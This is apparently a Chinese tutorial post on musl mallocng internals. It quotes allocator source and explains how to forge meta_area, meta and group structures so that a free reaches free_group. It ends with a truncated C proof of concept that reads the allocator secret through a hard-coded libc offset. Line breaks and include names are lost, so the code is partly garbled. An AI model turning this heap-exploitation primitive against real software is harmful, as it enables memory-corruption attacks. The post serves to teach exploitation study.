debug musl( 七 )

< 32) usage += ctx.usage_by_class[sc + 1];// try to drop to a lower count if the one found above// increases usage by more than 25%. these reduced counts// roughly fill an integral number of pages, just not a// power of two, limiting amount of unusable space.if (4 * cnt > usage && !nosmall) {if (0);else if ((sc & 3) == 1 && size * cnt > 8 * pagesize)cnt = 2;else if ((sc & 3) == 2 && size * cnt > 4 * pagesize)cnt = 3;else if ((sc & 3) == 0 && size * cnt > 8 * pagesize)cnt = 3;else if ((sc & 3) == 0 && size * cnt > 2 * pagesize)cnt = 5;}size_t needed = size * cnt + UNIT;needed += -needed & (pagesize - 1);// produce an individually-mmapped allocation if usage is low,// bounce counter hasn't triggered, and either it saves memory// or it avoids eagar slot allocation without wasting too much.if (!nosmall && cnt <= 7) {req += IB + UNIT;req += -req & (pagesize - 1);if (req < size + UNIT || (req >= 4 * pagesize && 2 * cnt > usage)) {cnt = 1;needed = req;}}p = mmap(0, needed, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);if (p == MAP_FAILED) {free_meta(m);return 0;}m->maplen = needed >> 12;ctx.mmap_counter++;active_idx = (4096 - UNIT) / size - 1;if (active_idx > cnt - 1) active_idx = cnt - 1;if (active_idx < 0) active_idx = 0;}
如果所需内存不超过页大小的一半,则再申请一个所需大小的 chunk,然后在其中构造 group。与正常申请不同的是,这里直接调用 get_slot_index 获取 chunk 的下标,不过和正常申请实际是一样的。在申请的 chunk 的头部要打上标记(p[-3] = (p[-3] & 31) | (6 << 5)),同时要保证 sizeclass 满足 sc < 48。之后调用 free 函数触发释放流程。
uint32_t self = 1u << i;int sc = g->sizeclass;uint32_t mask = g->freed_mask | g->avail_mask;if (mask + self == (2u << g->last_idx) - 1 && okay_to_free(g)) {// any multi-slot group is necessarily on an active list// here, but single-slot groups might or might not be.if (g->next) {assert(sc < 48);int activate_new = (ctx.active[sc] == g);dequeue(&ctx.active[sc], g);if (activate_new && ctx.active[sc])activate_group(ctx.active[sc]);}return free_group(g);}
之后进入 free_group 函数后,为了减小伪造难度、不再递归调用 nontrivial_free,要保证伪造 meta 的 maplen 不为零。
static struct mapinfo free_group(struct meta *g) {struct mapinfo mi = {0};int sc = g->sizeclass;if (sc < 48) {ctx.usage_by_class[sc] -= g->last_idx + 1;}if (g->maplen) {step_seq();record_seq(sc);mi.base = g->mem;mi.len = g->maplen * 4096UL;} else {void *p = g->mem;struct meta *m = get_meta(p);int idx = get_slot_index(p);g->mem->meta = 0;// not checking size/reserved here; it's intentionally invalidmi = nontrivial_free(m, idx);}free_meta(g);return mi;}
poc 如下:
#include #include #include #include #include #include #include #define UNIT 16#define IB 4#define FAKE_CHUNK_SIZE 0x80#define FAKE_CHUNK_INDEX 1#define LAST_INDEX 4const uint16_t size_classes[] = {1, 2, 3, 4, 5, 6, 7, 8,9, 10, 12, 15,18, 20, 25, 31,36, 42, 50, 63,72, 84, 102, 127,146, 170, 204, 255,292, 340, 409, 511,584, 682, 818, 1023,1169, 1364, 1637, 2047,2340, 2730, 3276, 4095,4680, 5460, 6552, 8191,};static inline int size_to_class(size_t n) {n = (n + IB - 1) >> 4;if (n < 10) return n;n++;int i = (28 - __builtin_ctz(n)) * 4 + 8;if (n > size_classes[i + 1]) i += 2;if (n > size_classes[i]) i++;return i;}struct malloc_context {uint64_t secret;int init_done;unsigned mmap_counter;struct meta *free_meta_head;struct meta *avail_meta;size_t avail_meta_count, avail_meta_area_count, meta_alloc_shift;struct meta_area *meta_area_head, *meta_area_tail;unsigned char *avail_meta_areas;struct meta *active[48];size_t usage_by_class[48];uint8_t unmap_seq[32], bounces[32];uint8_t seq;uintptr_t brk;};struct group {struct meta *meta;unsigned char active_idx: 5;char pad[UNIT - sizeof(struct meta *) - 1];unsigned char storage[];};struct meta {struct meta *prev, *next;struct group *mem;volatile int avail_mask, freed_mask;uintptr_t last_idx: 5;uintptr_t freeable: 1;uintptr_t sizeclass: 6;uintptr_t maplen: 8 * sizeof(uintptr_t) - 12;};struct meta_area {uint64_t check;struct meta_area *next;int nslots;struct meta slots[];};int main() {struct malloc_context *ctx = (struct malloc_context *) (&printf + 0x247193);struct meta target = {};void *mmap_space = mmap(NULL, 0x2000, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);struct meta_area *fake_meta_area = mmap_space;fake_meta_area->check = ctx->secret;struct meta *fake_meta = (struct meta *) ((uint64_t) mmap_space + 0x100);fake_meta->maplen = 1;fake_meta->sizeclass = size_to_class(FAKE_CHUNK_SIZE - IB);fake_meta->last_idx = LAST_INDEX;fake_meta->freeable = 1;struct group *fake_group = (struct group *) ((uint64_t) mmap_space + 
0x1000);fake_meta->mem = fake_group;fake_group->meta = fake_meta;fake_meta->avail_mask = ((2U